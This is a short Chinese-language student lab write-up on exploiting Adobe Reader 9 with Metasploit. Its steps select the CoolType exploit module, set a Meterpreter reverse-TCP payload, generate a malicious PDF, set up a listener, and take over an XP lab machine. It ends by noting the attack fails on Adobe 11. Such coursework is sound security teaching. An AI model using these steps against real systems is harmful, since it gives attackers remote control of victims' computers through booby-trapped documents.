Adobe9阅读器渗透攻击
实验步骤:
-
在kali终端中开启msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
-
使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
-
输入命令show options显示我们需要在攻击前需要设置的属性
-
输入命令
-
输入exploit,生成pdf文件(在隐藏文件夹中/.msf/local/5301.pdf)将pdf复制到靶机里。(因为我自己的kail拖拽不了文件出来,又换到了老师的kail。。。)
-
使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
-
使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。需要输入命令set LPORT 5301,端口监听一致。
-
使用命令exploit开始攻击,在xp中打开pdf,攻击成功,查看xp靶机信息。
- 但是,同样在xp adobe11下打开显示为“hello world”,尴尬的失效了,可见更新软件多么重要。